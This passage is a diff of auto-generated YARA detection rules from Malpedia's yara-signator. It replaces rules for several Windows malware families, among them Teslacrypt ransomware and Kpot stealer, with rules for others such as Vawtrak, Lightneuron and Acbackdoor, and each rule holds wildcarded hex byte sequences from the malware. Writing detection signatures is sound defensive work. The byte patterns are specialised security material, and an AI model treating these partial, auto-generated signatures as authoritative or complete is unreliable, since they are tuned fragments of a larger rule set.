-		$sequence_1 = { 742e 837d1800 0f85cf020000 6800080000 }
-		$sequence_2 = { a3???????? c705????????19c98f00 c705????????73c98f00 c705????????f8c98f00 a3???????? c705????????bdbf8f00 }
-		$sequence_3 = { 8b0cbda05f9a00 f6440e0401 743d 833c0eff 7437 }
-		$sequence_4 = { 8935???????? 85c9 7504 85f6 745b 8b7d14 }
-		$sequence_5 = { 33c0 0f57c0 6689842450070000 33f6 660f13442440 }
-		$sequence_6 = { c744242400004000 6a00 50 c744243000000000 c744246c00100000 c744247000000000 c744247400f00400 }
-		$sequence_7 = { b8???????? c705????????88c88f00 a3???????? c705????????19c98f00 c705????????73c98f00 }
-		$sequence_8 = { 7523 e8???????? 8bf8 8bca 893d???????? }
-		$sequence_9 = { 55 8bec a1???????? 81ec9c010000 }
+		$sequence_0 = { c705????????5411e14c c705????????2b3d0396 c705????????e54dcca2 c705????????92d61819 c705????????0c56aef3 c705????????c8a4ea05 }
+		$sequence_1 = { 50 0f2805???????? 8d85bcfbffff 0f1145d0 }
+		$sequence_2 = { c705????????2b342411 c705????????4a06d5fe c705????????5411e14c c705????????2b3d0396 c705????????e54dcca2 c705????????92d61819 c705????????0c56aef3 }
+		$sequence_3 = { 84c0 75f8 0f2805???????? 8d85bdfaffff 8bca c785b8faffff39313044 }
+		$sequence_4 = { e8???????? 83c438 8d8500f8ffff 6a00 }
+		$sequence_5 = { 84c0 75f9 8dbd98faffff 2bd6 }
+		$sequence_6 = { 8d45fc 50 8b8574fdffff 83c008 50 ff75ec ff15???????? }
+		$sequence_7 = { c785b8faffff39313044 c1e902 f3a5 8bca }
+		$sequence_8 = { c705????????8e220b1d c705????????6825794d c705????????4506ce62 c705????????b60451f0 c705????????3f3f5288 }
+		$sequence_9 = { 6800040000 8d8598f6ffff 6a00 50 e8???????? 83c40c 8d8598feffff }
 
 	condition:
-		7 of them and filesize < 1523712
+		7 of them and filesize < 1171456
 }
-rule MALPEDIA_Win_Dexbia_Auto : FILE
+rule MALPEDIA_Win_Lightneuron_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d4032cc9-0c2b-5612-9b25-c1c6f50e458e"
+		id = "4c2cf7c9-a6e0-519d-9025-fdcf709d68d0"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexbia"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dexbia_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightneuron"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lightneuron_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "1dcaac0ec64ac5a8c76c0fa411e7e39bdabd41113089ec01c21fddb197f9dd6c"
+		logic_hash = "5722f811a0c9c408e5a8640f3b100c752da3b058e0e2eee886d08d397042326e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107341,32 +107432,32 @@ rule MALPEDIA_Win_Dexbia_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bcb 8d442410 83e103 50 f3a4 68???????? ff15???????? }
-		$sequence_1 = { b85c140000 e8???????? 55 56 57 }
-		$sequence_2 = { 33c0 83c40c f2ae f7d1 2bf9 8d54247c 8bf7 }
-		$sequence_3 = { f3a5 8bca 83c020 83e103 8d9424a0120000 f3a4 }
-		$sequence_4 = { 68???????? f3ab 8b0d???????? 66ab aa }
-		$sequence_5 = { 51 68???????? 68???????? 68???????? e8???????? 83c428 85c0 }
-		$sequence_6 = { c786a801000000000000 8d8ef8000000 8d9638010000 51 52 e8???????? }
-		$sequence_7 = { ff248579354000 834df0ff 8955cc 8955d8 8955e0 }
-		$sequence_8 = { 8be8 85ed 7522 ff15???????? 8b35???????? 53 ffd6 }
-		$sequence_9 = { f3ab 66ab aa 8b442410 b908000000 8dbc249c120000 6800140000 }
+		$sequence_0 = { 410fafd5 0fafce 8bc2 c1e210 c1e810 4403d0 8bc1 }
+		$sequence_1 = { c1c108 33d1 4333949ed0ff0200 413354240c 83c3fe 0f8458010000 448bdb }
+		$sequence_2 = { 0f87aa010000 48895c2460 8d5ffd 48896c2468 85db 0f8e77010000 66666666660f1f840000000000 }
+		$sequence_3 = { 4c8be1 448d4210 488d4c2420 ffc6 c1e604 498be9 e8???????? }
+		$sequence_4 = { 4c897c2428 4533c9 44897c2420 488d0d2fe80200 4533c0 ba74270000 e8???????? }
+		$sequence_5 = { 48896c2468 4885ed 7409 8b742450 e9???????? 83782804 757e }
+		$sequence_6 = { 4885c0 4c8d842480000000 498bcf 480f45d0 e8???????? 488b05???????? 4c8b05???????? }
+		$sequence_7 = { 41336c2408 418b9486d0f70200 410fb6c0 418b8c86d0f70200 c1ca08 410fb6c1 c1c110 }
+		$sequence_8 = { 48c78424a8000000ffffffff 48c78424b000000000000000 48c78424b800000001000000 48c78424c000000002000000 48c78424c800000003000000 33c0 83f801 }
+		$sequence_9 = { ffe1 488b4318 488d942480000000 41b802000000 0fb74808 888c2480000000 66c1e908 }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 573440
 }
-rule MALPEDIA_Win_Mbrlocker_Auto : FILE
+rule MALPEDIA_Win_Putabmow_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6a472526-8a03-5ccc-a5eb-10b46b34c6da"
+		id = "7af0c993-b539-52ac-a45e-8054f116f777"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlocker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mbrlocker_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.putabmow"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.putabmow_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "2abe677d378843746aa6479444a4219927906b009fff2766ade4f081783dbae6"
+		logic_hash = "fefc0574406d648a12b534d0b553ded64a93f4ffe228447991ac5fd25e755fac"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107380,34 +107471,34 @@ rule MALPEDIA_Win_Mbrlocker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 8b35???????? 8b3d???????? 6a10 68???????? }
-		$sequence_1 = { 68fe000000 68???????? ffd7 83c408 }
-		$sequence_2 = { 68ac000000 68???????? e8???????? 68ac000000 68???????? ffd7 83c408 }
-		$sequence_3 = { c705????????ba514000 c705????????00020000 68fe000000 68???????? ffd6 83c408 68ff000000 }
-		$sequence_4 = { 68ac000000 68???????? e8???????? e8???????? }
-		$sequence_5 = { 68ff000000 68ac000000 68???????? e8???????? e8???????? 68ff000000 68ac000000 }
-		$sequence_6 = { ac 30c8 aa 4a 75f9 61 c9 }
-		$sequence_7 = { 68fe000000 68???????? e8???????? 68fe000000 }
-		$sequence_8 = { 68fe000000 68???????? e8???????? e8???????? 68ff000000 68fe000000 }
-		$sequence_9 = { 31c8 e8???????? 68ac000000 68???????? }
+		$sequence_0 = { 0fbec2 897dc0 8d0448 83c0d0 8945d8 }
+		$sequence_1 = { 7509 8b4c240c e8???????? c7442420ffffffff 8b4c240c 8b01 8b4004 }
+		$sequence_2 = { ba02000000 8bcf e8???????? 8b4df4 e9???????? 837b1802 0f8538010000 }
+		$sequence_3 = { c745ec0f000000 c745e800000000 c645d800 c745fc03000000 8d45d8 8bce 50 }
+		$sequence_4 = { c600e9 8b06 8b8e4c010000 5e 5b 89540101 b801000000 }
+		$sequence_5 = { 895dfc 85f6 7464 8b450c 8b08 85c9 }
+		$sequence_6 = { 7fcf 47 0fbec0 8d0c89 897dc0 8d49e8 }
+		$sequence_7 = { 83c408 a3???????? 53 57 ffd0 8b4df4 64890d00000000 }
+		$sequence_8 = { c7462c00000000 c7463000000000 c645fc01 8b461c 85c0 }
+		$sequence_9 = { eb02 8bc6 8a0458 43 8ac8 }
 
 	condition:
-		7 of them and filesize < 43008
+		7 of them and filesize < 704512
 }
-rule MALPEDIA_Win_Powerloader_Auto : FILE
+rule MALPEDIA_Win_Vawtrak_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a8055861-0eb8-5c59-854d-6c838621a56f"
+		id = "2112bb64-22b3-5c03-b2f8-c6e0d0b0c10f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.powerloader_auto.yar#L1-L106"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vawtrak"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.vawtrak_auto.yar#L1-L216"
 		license_url = "N/A"
-		logic_hash = "49acbf4818653ec3c37c64918d36c8fbd597bf611facefb0fe7af9324dfdd104"
+		logic_hash = "60253f607ddfb6f5514a6ed220e9ab8f7a24d3f7658f13c97c0cead0093a08d3"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -107419,32 +107510,45 @@ rule MALPEDIA_Win_Powerloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33d2 ff15???????? 83f81f 7323 }
-		$sequence_1 = { e8???????? eb22 33c9 66666666660f1f840000000000 }
-		$sequence_2 = { 8bf2 32db e8???????? 3bc7 7349 }
-		$sequence_3 = { 7441 8b5c2430 85db 741d }
-		$sequence_4 = { 32db e8???????? 3bc7 7349 }
-		$sequence_5 = { e8???????? 0fb6d8 84c0 7514 }
-		$sequence_6 = { ff15???????? 83f81f 7323 ff15???????? }
-		$sequence_7 = { e8???????? 0fb6d8 85ff 740c }
-		$sequence_8 = { e8???????? 0fb6d8 84c0 7514 ff15???????? }
-		$sequence_9 = { 33d2 c605????????00 e8???????? 0fb6c3 }
+		$sequence_0 = { 6a01 ff35???????? 6a04 6a01 }
+		$sequence_1 = { 6a04 6a01 50 ff15???????? 85c0 }
+		$sequence_2 = { 6a00 6a00 e8???????? 50 ff15???????? }
+		$sequence_3 = { 33c0 b900000080 40 8901 81e900100000 75f6 }
+		$sequence_4 = { c3 56 be???????? 33c0 40 8706 }
+		$sequence_5 = { ba00ff0000 8bc1 23c2 3bc2 }
+		$sequence_6 = { eb09 a804 7405 e8???????? 803d????????00 7405 }
+		$sequence_7 = { 85c0 7516 c705????????02000000 c705????????01000000 }
+		$sequence_8 = { 6a08 68???????? 56 ffd7 85c0 }
+		$sequence_9 = { 7528 68???????? ff15???????? 85c0 7504 }
+		$sequence_10 = { 50 ff15???????? a3???????? 85c0 74e7 }
+		$sequence_11 = { e8???????? 33d2 b9ff3f0000 f7f1 }
+		$sequence_12 = { 59 57 8bf0 ff15???????? 8bc6 }
+		$sequence_13 = { 8bc6 8703 3bc6 74f8 }
+		$sequence_14 = { 56 6a04 53 57 }
+		$sequence_15 = { 8d429f 3c0f 7705 80ea61 eb0a 8d42bf 3c0f }
+		$sequence_16 = { e9???????? 8ac1 c1e904 c0e004 }
+		$sequence_17 = { 8ac8 240f 80e1f0 80c110 32c8 }
+		$sequence_18 = { 3c41 7c11 3c46 7f0d }
+		$sequence_19 = { 42881408 85f6 75de 894b0c eb03 01730c }
+		$sequence_20 = { 3b4308 0f84e4000000 40883c08 ff430c e9???????? 0f86bf000000 81c7fffeffff }
+		$sequence_21 = { 48397c2430 7505 bb01000000 8bc3 }
+		$sequence_22 = { 3b4308 7748 85f6 742a }
 
 	condition:
-		7 of them and filesize < 155648
+		7 of them and filesize < 1027072
 }
-rule MALPEDIA_Win_Teslacrypt_Auto : FILE
+rule MALPEDIA_Win_Acbackdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b4c671eb-91dc-5665-a0e1-4c4ec53aea8a"
+		id = "4a823252-73f2-58f2-b3ba-b547632b74fc"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.teslacrypt"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.teslacrypt_auto.yar#L1-L164"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.acbackdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.acbackdoor_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "028a2cbfed6bdff0ce2536414ae610c52e3d43ebb868ac2645461114e681877e"
+		logic_hash = "0d2e2199924ba6f861c1f4e0ce544d152ae66498c3d6f8abd97960e9524ddf95"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107458,38 +107562,32 @@ rule MALPEDIA_Win_Teslacrypt_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 334500 335d04 334d08 33550c 81ffa0000000 0f8452030000 }
-		$sequence_1 = { 33457c 89859c000000 51 52 89f2 c1c808 0fb6c8 }
-		$sequence_2 = { 33550c 81ffa0000000 0f8456030000 81ffc0000000 0f84ae010000 }
-		$sequence_3 = { 0f84ac010000 81ffe0000000 740a b8ffffffff e9???????? }
-		$sequence_4 = { 3345f8 894518 3345fc 89451c }
-		$sequence_5 = { 3345f4 894514 3345f8 894518 }
-		$sequence_6 = { 3345fc 89451c 51 52 }
-		$sequence_7 = { 334500 335d04 83c510 8b7508 }
-		$sequence_8 = { 894c2434 89442430 8954242c 89742428 753a }
-		$sequence_9 = { 8b4c2418 83f900 894c2428 89442424 0f8540ffffff }
-		$sequence_10 = { 8954244c 894c2448 e8???????? 89442460 }
-		$sequence_11 = { 8b742410 39f1 8944240c 894c2408 88542407 }
-		$sequence_12 = { e8???????? 8d0dee304b00 8b542410 8902 890c24 e8???????? }
-		$sequence_13 = { 894a04 8b4c2468 890a e8???????? 83ec0c 31c9 8b54247c }
-		$sequence_14 = { 83f800 89442434 894c2458 0f842d010000 }
-		$sequence_15 = { 895c246c 89542468 89742464 897c2460 ffd6 83ec10 31c9 }
+		$sequence_0 = { e8???????? 85c0 7428 c744240440000000 892c24 8944241c e8???????? }
+		$sequence_1 = { c744240c01090000 c7442408???????? c744240401000000 891c24 e8???????? e9???????? c7442410b3904a00 }
+		$sequence_2 = { c78424c40000008c68059b c78424c80000006bbd41fb c78424cc000000abd9831f c78424d000000079217e13 c78424d400000019cde05b 89842458010000 83fb02 }
+		$sequence_3 = { e8???????? 85c0 0f848d000000 89c6 83c414 89f0 5b }
+		$sequence_4 = { e9???????? 8b95fc0d0000 8b85f80d0000 89542444 83c201 89442440 0f840f050000 }
+		$sequence_5 = { 89c7 8b442414 c744240440000000 890424 e8???????? 83c46c 89f8 }
+		$sequence_6 = { 89d6 c1ee19 8b0c8da0d64a00 c1e305 83e60f c1e104 0b0cb5a0d64a00 }
+		$sequence_7 = { 89742460 89542464 e9???????? c744242009000000 bd10000000 bb08000000 c744241403000000 }
+		$sequence_8 = { 8d7904 c70100000000 31c0 83e7fc c74411fc00000000 29f9 01d1 }
+		$sequence_9 = { 8b442424 39d8 0f8784080000 8d7e04 29c3 39fb 0f8277080000 }
 
 	condition:
-		7 of them and filesize < 1187840
+		7 of them and filesize < 1704960
 }
-rule MALPEDIA_Win_Htbot_Auto : FILE
+rule MALPEDIA_Win_Nemim_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b8c0c702-9e98-5ca8-9fa2-097b95e54dc8"
+		id = "23401018-c6d9-5370-9496-23a34b1b2310"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.htbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.htbot_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemim"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nemim_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "39353b8760f6514deb000f072c90c3958c292efa21f940225f19c2a80bdd3000"
+		logic_hash = "a74c5cc417011139586470805b653eee06eb07d9c80d556280876db9d2f1564f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107503,32 +107601,32 @@ rule MALPEDIA_Win_Htbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c6f0 3bc6 7448 837e0c00 8d7e0c 7c2c 8b10 }
-		$sequence_1 = { 33c0 5e 59 c3 51 8bc4 89642408 }
-		$sequence_2 = { 756c 8b4614 ba0c000000 f7e2 85d2 0f8719010000 7209 }
-		$sequence_3 = { 0f8412010000 83feff 7549 85db }
-		$sequence_4 = { 8d7c2418 e8???????? c684243402000000 8b44241c 83c0f0 83c40c 8d480c }
-		$sequence_5 = { 8d4c2440 89442464 e8???????? 85c0 0f8462050000 }
-		$sequence_6 = { e8???????? 83c410 837d2400 0f84c3000000 2b7508 d1fe }
-		$sequence_7 = { 50 8b4204 ffd0 8b4c2418 8b41f4 3bc3 0f841e0e0000 }
-		$sequence_8 = { b9???????? 1bc0 f7d8 83c003 8bf0 a1???????? 8b500c }
-		$sequence_9 = { 33c4 50 8d442420 64a300000000 33db 895c241c 895c2418 }
+		$sequence_0 = { c1f905 8d04c0 be00800000 8b0c8d40604300 }
+		$sequence_1 = { 6a00 6a00 52 6801000080 ff15???????? 85c0 753f }
+		$sequence_2 = { 743a 8b9c243c010000 8b2d???????? 8d4c2434 53 51 ffd5 }
+		$sequence_3 = { 56 57 55 8b0c8504744300 }
+		$sequence_4 = { 68???????? 68???????? e8???????? 8bf8 83c408 85ff 0f84a2000000 }
+		$sequence_5 = { 8856fd 884eff 8b4c2414 c60600 }
+		$sequence_6 = { 57 8b7c2410 b856555555 8d0cbd00000000 f7e9 }
+		$sequence_7 = { 8bc5 c1e005 ff90d0a74200 83c414 8bf8 83ff01 754b }
+		$sequence_8 = { 8d058c5e4300 83780800 754e b741 }
+		$sequence_9 = { 68???????? 53 ff15???????? 6a5c 68???????? }
 
 	condition:
-		7 of them and filesize < 196608
+		7 of them and filesize < 499712
 }
-rule MALPEDIA_Win_Kpot_Stealer_Auto : FILE
+rule MALPEDIA_Win_Keymarble_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e2a580eb-b7e8-5569-b0fb-2a299c9ec4b4"
+		id = "d1987e31-8cfb-500b-b69a-7c2a019e7ea8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kpot_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kpot_stealer_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.keymarble"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.keymarble_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "f623e53c9b602005767465c863e7a8d05ae4b1bf549ad4d0a72142bca2bcb3fc"
+		logic_hash = "04e65eb3ae3b01821122573e8815ad5d48f3cdd5d412f7107b80ce95c7695b7b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107542,32 +107640,32 @@ rule MALPEDIA_Win_Kpot_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0bc1 0fb64f04 c1e208 0bca 0fb65707 c1e208 0bd6 }
-		$sequence_1 = { 83f80f 7703 6a0f 58 3d00e00100 7605 83c8ff }
-		$sequence_2 = { 8b08 50 ff5108 832600 b001 c3 }
-		$sequence_3 = { 884b04 8bc1 c1e808 884305 8bc1 c1e810 884306 }
-		$sequence_4 = { 8ac3 e8???????? 84c0 7505 8b55f0 }
-		$sequence_5 = { 56 57 8bf8 8d4701 50 8bf1 ff15???????? }
-		$sequence_6 = { 8bf2 81e600001000 0bce c1e914 81e300000600 8bf2 81e600e00100 }
-		$sequence_7 = { 8bf0 7504 33c0 eb31 83feff 750a 8b4d08 }
-		$sequence_8 = { 5a 0f8418010000 83c708 c7450c08000000 8b47fc }
-		$sequence_9 = { c1e108 ff7514 0bc1 0fb64f02 ff7510 c1e110 }
+		$sequence_0 = { ff15???????? 50 e8???????? 83c404 56 6a40 ff15???????? }
+		$sequence_1 = { 83c408 85c0 7407 bb7a452301 }
+		$sequence_2 = { 50 ff15???????? 68???????? 6a40 }
+		$sequence_3 = { e8???????? 83c404 e8???????? 8d3470 81e6ffffff7f }
+		$sequence_4 = { e8???????? 83c408 85c0 7407 bb7a452301 }
+		$sequence_5 = { e8???????? 83c404 56 6a40 }
+		$sequence_6 = { ff15???????? 50 ff15???????? 68???????? 6a40 }
+		$sequence_7 = { e8???????? 83c404 56 6a40 ff15???????? }
+		$sequence_8 = { 6a00 6a03 6800000040 57 ffd6 }
+		$sequence_9 = { 56 e8???????? 68???????? ff15???????? 8bf0 85f6 }
 
 	condition:
-		7 of them and filesize < 219136
+		7 of them and filesize < 1146880
 }
-rule MALPEDIA_Win_Navrat_Auto : FILE
+rule MALPEDIA_Win_Buterat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c873f75a-bac6-59c1-887a-5d663acd72dd"
+		id = "25ad2a50-49be-5d4a-bf97-43396868ed49"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.navrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.navrat_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.buterat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.buterat_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "c07b699c6f0dfc54b32e135d358bdfb08bd5b26e1aa027b1f4dd7fec4dc44720"
+		logic_hash = "b70d6ce44ee783afa32cbecdbe7cf8ccdf3b06b682102fb9a600b816f864c117"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107581,32 +107679,32 @@ rule MALPEDIA_Win_Navrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d48d0 80f909 7707 0fbec0 83c004 c3 }
-		$sequence_1 = { 85f6 7407 8b7608 83461c02 5f }
-		$sequence_2 = { 56 68???????? 50 8d85f0feffff 8bf1 }
-		$sequence_3 = { 1bf6 f7de 56 68???????? }
-		$sequence_4 = { c745d477617265 c745d85c4d6963 c745dc726f736f c745e066745c57 c745e4696e646f }
-		$sequence_5 = { c647033d 85f6 7407 8b7608 }
-		$sequence_6 = { c745dc726f736f c745e066745c57 c745e4696e646f c745e877735c43 c745ec75727265 c745f06e745665 }
-		$sequence_7 = { 0fbec0 83c004 c3 3c2b 7503 }
-		$sequence_8 = { 83e847 c3 8d48d0 80f909 7707 0fbec0 }
-		$sequence_9 = { 8d48bf 80f919 7707 0fbec0 83e841 c3 }
+		$sequence_0 = { ff750c 8d8564ffffff 50 56 8d5de8 e8???????? 83c414 }
+		$sequence_1 = { c3 8bce 69c944010000 8d81a05b4100 8b10 c1e204 }
+		$sequence_2 = { b9???????? e8???????? 6a00 50 ff15???????? 8bf0 }
+		$sequence_3 = { ff7570 56 e8???????? 8b4574 }
+		$sequence_4 = { 33f6 40 eb1a 81f900000100 }
+		$sequence_5 = { e8???????? 99 f77dfc 8bda 837d6806 750b e8???????? }
+		$sequence_6 = { 33c0 40 8b4d1c 3bce 7405 }
+		$sequence_7 = { 8bec 83ec2c 56 57 6a02 8bf0 }
+		$sequence_8 = { 56 57 7512 0fb64508 6bc014 8bb848044200 897dfc }
+		$sequence_9 = { 53 53 a3???????? 895c2420 895c2424 895c241c 53 }
 
 	condition:
-		7 of them and filesize < 352256
+		7 of them and filesize < 278528
 }
-rule MALPEDIA_Win_Httpbrowser_Auto : FILE
+rule MALPEDIA_Win_Abcsync_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "adff80ab-eb6c-5a3c-b157-43b2baed9ae7"
+		id = "d5810457-8b12-50ce-8030-bdbd5a136267"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpbrowser"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.httpbrowser_auto.yar#L1-L173"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.abcsync"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.abcsync_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "00c38478a4fbc51d8b9ca5fb24e8846e76e8f61512ecf76046dde9dd700684fd"
+		logic_hash = "02ae937251ee063be53e02e33e98dc9b276f9fd2074f9431e5bc0ede2973fadf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107620,40 +107718,34 @@ rule MALPEDIA_Win_Httpbrowser_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 8d85fcedffff 6a00 50 e8???????? 53 }
-		$sequence_1 = { a3???????? 3bfe 7459 68???????? 68???????? e8???????? 59 }
-		$sequence_2 = { 75f9 6a00 2bc1 8d4dfc 51 }
-		$sequence_3 = { e8???????? 83c40c ff15???????? 8985ecfeffff }
-		$sequence_4 = { 6a00 50 e8???????? 83c418 8d856853ffff 50 }
-		$sequence_5 = { ffb538eeffff ff15???????? 85c0 744a 53 53 ffb52ceeffff }
-		$sequence_6 = { 33c9 41 6a06 66898de8fdffff }
-		$sequence_7 = { 56 ff15???????? 8985e0fbffff 3bc6 7428 56 56 }
-		$sequence_8 = { 33d2 b9ff010000 33c0 8dbd5af2ffff }
-		$sequence_9 = { 8b55fc 8a92704d4100 0890a1524100 40 3bc7 76f5 41 }
-		$sequence_10 = { 5d 8a4c15b8 884dec 8b45ec }
-		$sequence_11 = { 5d 5d 9d 5d 8b4510 }
-		$sequence_12 = { 50 ff15???????? 83c410 68???????? 55 8bec 9c }
-		$sequence_13 = { 5d 8d9544f3ffff 8d854453ffff 52 }
-		$sequence_14 = { 58 b900020000 33c0 8dbdf8f7ffff f3ab 50 50 }
-		$sequence_15 = { 57 83f9ff 7414 8bf9 c1ff05 83e11f 8b3cbd00644100 }
+		$sequence_0 = { 6bc232 2bc8 8d4107 410fb64c1afc 4898 }
+		$sequence_1 = { 41884afc 418d4916 f7e9 418bc9 c1fa04 8bc2 c1e81f }
+		$sequence_2 = { 6bc232 2bc8 8d4121 4898 420fb60c18 }
+		$sequence_3 = { c744243442015500 c744243847013200 c744243c4d004d00 c74424404e000100 e8???????? 488bc8 ff15???????? }
+		$sequence_4 = { 418bc9 4d8d521f c1fa04 8bc2 c1e81f 03d0 6bc232 }
+		$sequence_5 = { e8???????? 488d15ba940000 488d0dab940000 e8???????? 488b4308 833800 750e }
+		$sequence_6 = { 2bc8 8d4112 410fb64c1afe 4898 422a0c18 41884afe 4183f913 }
+		$sequence_7 = { 4c89442420 33c9 4533c0 ff15???????? 85c0 0f8e37040000 488b05???????? }
+		$sequence_8 = { 4903ce 85db 742a 4d8bc5 4c2bc1 0f1f4000 6666660f1f840000000000 }
+		$sequence_9 = { 8bc2 c1e81f 03d0 6bc232 2bc8 8d411c 410fb64c1afc }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 348160
 }
-rule MALPEDIA_Win_Glassrat_Auto : FILE
+rule MALPEDIA_Win_9002_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "42f75008-33b0-5628-aa20-35cf904b2cc2"
+		id = "9aa2661d-b448-5e86-992b-d0dd1273bcc5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.glassrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.glassrat_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.9002"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.9002_auto.yar#L1-L343"
 		license_url = "N/A"
-		logic_hash = "4ee9c1e6fb6f5290f1ce6d0e335f981f784c2b61e1aa9e3c4c33ebb2644983ee"
